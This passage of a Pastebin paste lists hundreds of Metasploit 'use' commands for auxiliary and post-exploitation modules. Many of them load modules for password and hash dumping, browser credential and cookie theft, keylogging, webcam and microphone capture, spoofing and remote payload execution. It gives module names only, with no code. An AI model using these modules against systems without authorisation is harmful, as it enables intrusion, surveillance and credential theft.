  1181. use auxiliary/fuzzers/ntp/ntp_protocol_fuzzer
  1182. use auxiliary/fuzzers/smb/smb2_negotiate_corrupt
  1183. use auxiliary/fuzzers/smb/smb_create_pipe
  1184. use auxiliary/fuzzers/smb/smb_create_pipe_corrupt
  1185. use auxiliary/fuzzers/smb/smb_negotiate_corrupt
  1186. use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
  1187. use auxiliary/fuzzers/smb/smb_tree_connect
  1188. use auxiliary/fuzzers/smb/smb_tree_connect_corrupt
  1189. use auxiliary/fuzzers/smtp/smtp_fuzzer
  1190. use auxiliary/fuzzers/ssh/ssh_kexinit_corrupt
  1191. use auxiliary/fuzzers/ssh/ssh_version_15
  1192. use auxiliary/fuzzers/ssh/ssh_version_2
  1193. use auxiliary/fuzzers/ssh/ssh_version_corrupt
  1194. use auxiliary/fuzzers/tds/tds_login_corrupt
  1195. use auxiliary/fuzzers/tds/tds_login_username
  1196. use auxiliary/fuzzers/tftp/tftp_fuzzer
  1197. use auxiliary/gather/alienvault_iso27001_sqli
  1198. use auxiliary/gather/alienvault_newpolicyform_sqli
  1199. use auxiliary/gather/android_browser_new_tab_cookie_theft
  1200. use auxiliary/gather/android_htmlfileprovider
  1201. use auxiliary/gather/android_stock_browser_uxss
  1202. use auxiliary/gather/apache_rave_creds
  1203. use auxiliary/gather/apple_safari_webarchive_uxss
  1204. use auxiliary/gather/checkpoint_hostname
  1205. use auxiliary/gather/chromecast_wifi
  1206. use auxiliary/gather/citrix_published_applications
  1207. use auxiliary/gather/citrix_published_bruteforce
  1208. use auxiliary/gather/coldfusion_pwd_props
  1209. use auxiliary/gather/corpwatch_lookup_id
  1210. use auxiliary/gather/corpwatch_lookup_name
  1211. use auxiliary/gather/d20pass
  1212. use auxiliary/gather/dns_bruteforce
  1213. use auxiliary/gather/dns_cache_scraper
  1214. use auxiliary/gather/dns_info
  1215. use auxiliary/gather/dns_reverse_lookup
  1216. use auxiliary/gather/dns_srv_enum
  1217. use auxiliary/gather/doliwamp_traversal_creds
  1218. use auxiliary/gather/drupal_openid_xxe
  1219. use auxiliary/gather/eaton_nsm_creds
  1220. use auxiliary/gather/emc_cta_xxe
  1221. use auxiliary/gather/enum_dns
  1222. use auxiliary/gather/eventlog_cred_disclosure
  1223. use auxiliary/gather/external_ip
  1224. use auxiliary/gather/f5_bigip_cookie_disclosure
  1225. use auxiliary/gather/flash_rosetta_jsonp_url_disclosure
  1226. use auxiliary/gather/hp_enum_perfd
  1227. use auxiliary/gather/hp_snac_domain_creds
  1228. use auxiliary/gather/huawei_wifi_info
  1229. use auxiliary/gather/ibm_sametime_enumerate_users
  1230. use auxiliary/gather/ibm_sametime_room_brute
  1231. use auxiliary/gather/ibm_sametime_version
  1232. use auxiliary/gather/ie_uxss_injection
  1233. use auxiliary/gather/impersonate_ssl
  1234. use auxiliary/gather/java_rmi_registry
  1235. use auxiliary/gather/joomla_weblinks_sqli
  1236. use auxiliary/gather/konica_minolta_pwd_extract
  1237. use auxiliary/gather/mantisbt_admin_sqli
  1238. use auxiliary/gather/mcafee_epo_xxe
  1239. use auxiliary/gather/memcached_extractor
  1240. use auxiliary/gather/mongodb_js_inject_collection_enum
  1241. use auxiliary/gather/ms14_052_xmldom
  1242. use auxiliary/gather/mybb_db_fingerprint
  1243. use auxiliary/gather/natpmp_external_address
  1244. use auxiliary/gather/opennms_xxe
  1245. use auxiliary/gather/search_email_collector
  1246. use auxiliary/gather/shodan_search
  1247. use auxiliary/gather/solarwinds_orion_sqli
  1248. use auxiliary/gather/trackit_sql_domain_creds
  1249. use auxiliary/gather/vbulletin_vote_sqli
  1250. use auxiliary/gather/windows_deployment_services_shares
  1251. use auxiliary/gather/wp_w3_total_cache_hash_extract
  1252. use auxiliary/gather/xbmc_traversal
  1253. use auxiliary/gather/xerox_pwd_extract
  1254. use auxiliary/gather/xerox_workcentre_5xxx_ldap
  1255. use auxiliary/parser/unattend
  1256. use auxiliary/pdf/foxit/authbypass
  1257. use auxiliary/scanner/fuzzer/imap_fuzzer
  1258. use auxiliary/scanner/fuzzer/tftp_fuzzer
  1259. use auxiliary/scanner/http/cn_caidao_backdoor_bruteforce
  1260. use auxiliary/scanner/http/cold_fusion_version
  1261. use auxiliary/scanner/http/http_title
  1262. use auxiliary/scanner/http/linknat_vos_manager_userpass
  1263. use auxiliary/scanner/http/vmware_server_dir_trav
  1264. use auxiliary/scanner/http/vmware_update_manager_traversal
  1265. use auxiliary/scanner/misc/redis_server
  1266. use auxiliary/scanner/netbios/nbname_probe
  1267. use auxiliary/scanner/sip/enumerator_asterisk_nat_peers
  1268. use auxiliary/scanner/sip/sipcrack
  1269. use auxiliary/scanner/sip/sipcrack_tcp
  1270. use auxiliary/scanner/sip/sipflood
  1271. use auxiliary/scanner/sip/sipflood_tcp
  1272. use auxiliary/scanner/sip/sipinvite
  1273. use auxiliary/scanner/sip/sipinvite_tcp
  1274. use auxiliary/scanner/sip/sipscan
  1275. use auxiliary/scanner/sip/sipscan_tcp
  1276. use auxiliary/scanner/telnet/telnet_version2
  1277. use auxiliary/server/browser_autopwn
  1278. use auxiliary/server/capture/drda
  1279. use auxiliary/server/capture/ftp
  1280. use auxiliary/server/capture/http
  1281. use auxiliary/server/capture/http_basic
  1282. use auxiliary/server/capture/http_javascript_keylogger
  1283. use auxiliary/server/capture/http_ntlm
  1284. use auxiliary/server/capture/imap
  1285. use auxiliary/server/capture/mssql
  1286. use auxiliary/server/capture/mysql
  1287. use auxiliary/server/capture/pop3
  1288. use auxiliary/server/capture/postgresql
  1289. use auxiliary/server/capture/printjob_capture
  1290. use auxiliary/server/capture/sip
  1291. use auxiliary/server/capture/smb
  1292. use auxiliary/server/capture/smtp
  1293. use auxiliary/server/capture/telnet
  1294. use auxiliary/server/capture/vnc
  1295. use auxiliary/server/dhclient_bash_env
  1296. use auxiliary/server/dhcp
  1297. use auxiliary/server/dns/spoofhelper
  1298. use auxiliary/server/fakedns
  1299. use auxiliary/server/ftp
  1300. use auxiliary/server/http_ntlmrelay
  1301. use auxiliary/server/icmp_exfil
  1302. use auxiliary/server/openssl_heartbeat_client_memory
  1303. use auxiliary/server/pxeexploit
  1304. use auxiliary/server/socks4a
  1305. use auxiliary/server/socks_unc
  1306. use auxiliary/server/tftp
  1307. use auxiliary/server/tnftp_savefile
  1308. use auxiliary/server/webkit_xslt_dropper
  1309. use auxiliary/server/wget_symlink_file_write
  1310. use auxiliary/server/wpad
  1311. use auxiliary/sniffer/psnuffle
  1312. use auxiliary/spoof/arp/arp_poisoning
  1313. use auxiliary/spoof/cisco/cdp
  1314. use auxiliary/spoof/cisco/dtp
  1315. use auxiliary/spoof/dns/bailiwicked_domain
  1316. use auxiliary/spoof/dns/bailiwicked_host
  1317. use auxiliary/spoof/dns/compare_results
  1318. use auxiliary/spoof/llmnr/llmnr_response
  1319. use auxiliary/spoof/nbns/nbns_response
  1320. use auxiliary/spoof/replay/pcap_replay
  1321. use auxiliary/sqli/oracle/dbms_cdc_ipublish
  1322. use auxiliary/sqli/oracle/dbms_cdc_publish
  1323. use auxiliary/sqli/oracle/dbms_cdc_publish2
  1324. use auxiliary/sqli/oracle/dbms_cdc_publish3
  1325. use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription
  1326. use auxiliary/sqli/oracle/dbms_export_extension
  1327. use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml
  1328. use auxiliary/sqli/oracle/dbms_metadata_get_xml
  1329. use auxiliary/sqli/oracle/dbms_metadata_open
  1330. use auxiliary/sqli/oracle/droptable_trigger
  1331. use auxiliary/sqli/oracle/jvm_os_code_10g
  1332. use auxiliary/sqli/oracle/jvm_os_code_11g
  1333. use auxiliary/sqli/oracle/lt_compressworkspace
  1334. use auxiliary/sqli/oracle/lt_findricset_cursor
  1335. use auxiliary/sqli/oracle/lt_mergeworkspace
  1336. use auxiliary/sqli/oracle/lt_removeworkspace
  1337. use auxiliary/sqli/oracle/lt_rollbackworkspace
  1338. use auxiliary/voip/asterisk_login
  1339. use auxiliary/voip/cisco_cucdm_call_forward
  1340. use auxiliary/voip/cisco_cucdm_speed_dials
  1341. use auxiliary/voip/sip_deregister
  1342. use auxiliary/voip/sip_invite_spoof
  1343. use auxiliary/vsploit/malware/dns/dns_mariposa
  1344. use auxiliary/vsploit/malware/dns/dns_query
  1345. use auxiliary/vsploit/malware/dns/dns_zeus
  1346. use auxiliary/vsploit/pii/email_pii
  1347. use auxiliary/vsploit/pii/web_pii
  1348.  
  1349.  
  1350.  
  1351.  
  1352. # post :
  1353.  
  1354. use post/aix/hashdump
  1355. use post/cisco/gather/enum_cisco
  1356. use post/firefox/gather/cookies
  1357. use post/firefox/gather/history
  1358. use post/firefox/gather/passwords
  1359. use post/firefox/gather/xss
  1360. use post/firefox/manage/webcam_chat
  1361. use post/linux/gather/checkvm
  1362. use post/linux/gather/ecryptfs_creds
  1363. use post/linux/gather/enum_configs
  1364. use post/linux/gather/enum_network
  1365. use post/linux/gather/enum_protections
  1366. use post/linux/gather/enum_psk
  1367. use post/linux/gather/enum_system
  1368. use post/linux/gather/enum_users_history
  1369. use post/linux/gather/enum_xchat
  1370. use post/linux/gather/gnome_commander_creds
  1371. use post/linux/gather/hashdump
  1372. use post/linux/gather/mount_cifs_creds
  1373. use post/linux/gather/pptpd_chap_secrets
  1374. use post/linux/manage/download_exec
  1375. use post/multi/escalate/cups_root_file_read
  1376. use post/multi/escalate/metasploit_pcaplog
  1377. use post/multi/gather/apple_ios_backup
  1378. use post/multi/gather/check_malware
  1379. use post/multi/gather/dbvis_enum
  1380. use post/multi/gather/dns_bruteforce
  1381. use post/multi/gather/dns_reverse_lookup
  1382. use post/multi/gather/dns_srv_lookup
  1383. use post/multi/gather/enum_vbox
  1384. use post/multi/gather/env
  1385. use post/multi/gather/fetchmailrc_creds
  1386. use post/multi/gather/filezilla_client_cred
  1387. use post/multi/gather/find_vmx
  1388. use post/multi/gather/firefox_creds
  1389. use post/multi/gather/gpg_creds
  1390. use post/multi/gather/lastpass_creds
  1391. use post/multi/gather/multi_command
  1392. use post/multi/gather/netrc_creds
  1393. use post/multi/gather/pgpass_creds
  1394. use post/multi/gather/pidgin_cred
  1395. use post/multi/gather/ping_sweep
  1396. use post/multi/gather/remmina_creds
  1397. use post/multi/gather/resolve_hosts
  1398. use post/multi/gather/rubygems_api_key
  1399. use post/multi/gather/run_console_rc_file
  1400. use post/multi/gather/skype_enum
  1401. use post/multi/gather/ssh_creds
  1402. use post/multi/gather/thunderbird_creds
  1403. use post/multi/gather/wlan_geolocate
  1404. use post/multi/general/close
  1405. use post/multi/general/execute
  1406. use post/multi/manage/dbvis_add_db_admin
  1407. use post/multi/manage/dbvis_query
  1408. use post/multi/manage/multi_post
  1409. use post/multi/manage/play_youtube
  1410. use post/multi/manage/record_mic
  1411. use post/multi/manage/shell_to_meterpreter
  1412. use post/multi/manage/sudo
  1413. use post/multi/manage/system_session
  1414. use post/osx/admin/say
  1415. use post/osx/capture/keylog_recorder
  1416. use post/osx/capture/screen
  1417. use post/osx/gather/autologin_password
  1418. use post/osx/gather/enum_adium
  1419. use post/osx/gather/enum_airport
  1420. use post/osx/gather/enum_chicken_vnc_profile
  1421. use post/osx/gather/enum_colloquy
  1422. use post/osx/gather/enum_keychain
  1423. use post/osx/gather/enum_osx
  1424. use post/osx/gather/hashdump
  1425. use post/osx/gather/password_prompt_spoof
  1426. use post/osx/gather/safari_lastsession
  1427. use post/osx/manage/mount_share
  1428. use post/osx/manage/record_mic
  1429. use post/osx/manage/vpn
  1430. use post/osx/manage/webcam
  1431. use post/solaris/gather/checkvm
  1432. use post/solaris/gather/enum_packages
  1433. use post/solaris/gather/enum_services
  1434. use post/solaris/gather/hashdump
  1435. use post/windows/capture/keylog_recorder
  1436. use post/windows/capture/lockout_keylogger
  1437. use post/windows/escalate/droplnk
  1438. use post/windows/escalate/getsystem
  1439. use post/windows/escalate/golden_ticket
  1440. use post/windows/escalate/ms10_073_kbdlayout
  1441. use post/windows/escalate/screen_unlock
  1442. use post/windows/gather/arp_scanner
  1443. use post/windows/gather/bitcoin_jacker
  1444. use post/windows/gather/cachedump
  1445. use post/windows/gather/checkvm
  1446. use post/windows/gather/credentials/bulletproof_ftp
  1447. use post/windows/gather/credentials/coreftp
  1448. use post/windows/gather/credentials/credential_collector
  1449. use post/windows/gather/credentials/dyndns
  1450. use post/windows/gather/credentials/enum_cred_store
  1451. use post/windows/gather/credentials/enum_picasa_pwds
  1452. use post/windows/gather/credentials/epo_sql
  1453. use post/windows/gather/credentials/filezilla_server
  1454. use post/windows/gather/credentials/flashfxp
  1455. use post/windows/gather/credentials/ftpnavigator
  1456. use post/windows/gather/credentials/ftpx
  1457. use post/windows/gather/credentials/gpp
  1458. use post/windows/gather/credentials/idm
  1459. use post/windows/gather/credentials/imail
  1460. use post/windows/gather/credentials/imvu
  1461. use post/windows/gather/credentials/mcafee_vse_hashdump
  1462. use post/windows/gather/credentials/meebo
  1463. use post/windows/gather/credentials/mremote
  1464. use post/windows/gather/credentials/mssql_local_hashdump
  1465. use post/windows/gather/credentials/nimbuzz
  1466. use post/windows/gather/credentials/outlook
  1467. use post/windows/gather/credentials/razer_synapse
  1468. use post/windows/gather/credentials/razorsql
  1469. use post/windows/gather/credentials/rdc_manager_creds
  1470. use post/windows/gather/credentials/skype
  1471. use post/windows/gather/credentials/smartermail
  1472. use post/windows/gather/credentials/smartftp
  1473. use post/windows/gather/credentials/spark_im
  1474. use post/windows/gather/credentials/sso
  1475. use post/windows/gather/credentials/steam
  1476. use post/windows/gather/credentials/tortoisesvn
  1477. use post/windows/gather/credentials/total_commander
  1478. use post/windows/gather/credentials/trillian
  1479. use post/windows/gather/credentials/vnc
  1480. use post/windows/gather/credentials/windows_autologin
  1481. use post/windows/gather/credentials/winscp
  1482. use post/windows/gather/credentials/wsftp_client
  1483. use post/windows/gather/dnscache_dump
  1484. use post/windows/gather/dumplinks
  1485. use post/windows/gather/enum_ad_computers
  1486. use post/windows/gather/enum_ad_service_principal_names
  1487. use post/windows/gather/enum_ad_to_wordlist
  1488. use post/windows/gather/enum_ad_user_comments
  1489. use post/windows/gather/enum_ad_users
  1490. use post/windows/gather/enum_applications
  1491. use post/windows/gather/enum_artifacts
  1492. use post/windows/gather/enum_chrome
  1493. use post/windows/gather/enum_computers
  1494. use post/windows/gather/enum_db
  1495. use post/windows/gather/enum_devices
  1496. use post/windows/gather/enum_dirperms
  1497. use post/windows/gather/enum_domain
  1498. use post/windows/gather/enum_domain_group_users
  1499. use post/windows/gather/enum_domain_tokens
  1500. use post/windows/gather/enum_domain_users
  1501. use post/windows/gather/enum_domains
  1502. use post/windows/gather/enum_files
  1503. use post/windows/gather/enum_hostfile
  1504. use post/windows/gather/enum_ie
  1505. use post/windows/gather/enum_logged_on_users
  1506. use post/windows/gather/enum_ms_product_keys
  1507. use post/windows/gather/enum_muicache
  1508. use post/windows/gather/enum_patches
  1509. use post/windows/gather/enum_powershell_env
  1510. use post/windows/gather/enum_prefetch
  1511. use post/windows/gather/enum_proxy
  1512. use post/windows/gather/enum_services
  1513. use post/windows/gather/enum_shares
  1514. use post/windows/gather/enum_snmp
  1515. use post/windows/gather/enum_termserv
  1516. use post/windows/gather/enum_tokens
  1517. use post/windows/gather/enum_tomcat
  1518. use post/windows/gather/enum_unattend
  1519. use post/windows/gather/file_from_raw_ntfs
  1520. use post/windows/gather/forensics/browser_history
  1521. use post/windows/gather/forensics/duqu_check
  1522. use post/windows/gather/forensics/enum_drives
  1523. use post/windows/gather/forensics/imager
  1524. use post/windows/gather/forensics/nbd_server
  1525. use post/windows/gather/forensics/recovery_files
  1526. use post/windows/gather/hashdump
  1527. use post/windows/gather/local_admin_search_enum
  1528. use post/windows/gather/lsa_secrets
  1529. use post/windows/gather/memory_grep
  1530. use post/windows/gather/netlm_downgrade
  1531. use post/windows/gather/outlook
  1532. use post/windows/gather/phish_windows_credentials
  1533. use post/windows/gather/resolve_sid
  1534. use post/windows/gather/reverse_lookup
  1535. use post/windows/gather/screen_spy
  1536. use post/windows/gather/smart_hashdump
  1537. use post/windows/gather/tcpnetstat
  1538. use post/windows/gather/usb_history
  1539. use post/windows/gather/win_privs
  1540. use post/windows/gather/wmic_command
  1541. use post/windows/gather/word_unc_injector
  1542. use post/windows/manage/add_user_domain
  1543. use post/windows/manage/autoroute
  1544. use post/windows/manage/change_password
  1545. use post/windows/manage/clone_proxy_settings
  1546. use post/windows/manage/delete_user
  1547. use post/windows/manage/download_exec
  1548. use post/windows/manage/driver_loader
  1549. use post/windows/manage/enable_rdp
  1550. use post/windows/manage/enable_support_account
  1551. use post/windows/manage/ie_proxypac
  1552. use post/windows/manage/inject_ca
  1553. use post/windows/manage/inject_host
  1554. use post/windows/manage/migrate
  1555. use post/windows/manage/mssql_local_auth_bypass
  1556. use post/windows/manage/multi_meterpreter_inject
  1557. use post/windows/manage/nbd_server
  1558. use post/windows/manage/payload_inject
  1559. use post/windows/manage/portproxy
  1560. use post/windows/manage/powershell/exec_powershell
  1561. use post/windows/manage/pptp_tunnel
  1562. use post/windows/manage/pxeexploit
  1563. use post/windows/manage/reflective_dll_inject
  1564. use post/windows/manage/remove_ca
  1565. use post/windows/manage/remove_host
  1566. use post/windows/manage/rpcapd_start
  1567. use post/windows/manage/run_as
  1568. use post/windows/manage/sdel
  1569. use post/windows/manage/smart_migrate
  1570. use post/windows/manage/vss_create
  1571. use post/windows/manage/vss_list
  1572. use post/windows/manage/vss_mount
  1573. use post/windows/manage/vss_set_storage
  1574. use post/windows/manage/vss_storage
  1575. use post/windows/manage/webcam
  1576. use post/windows/recon/computer_browser_discovery
  1577. use post/windows/recon/outbound_ports
  1578. use post/windows/recon/resolve_ip
  1579. use post/windows/wlan/wlan_bss_list
  1580. use post/windows/wlan/wlan_current_connection
  1581. use post/windows/wlan/wlan_disconnect
  1582. use post/windows/wlan/wlan_profile
  1583.  
  1584. ---------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!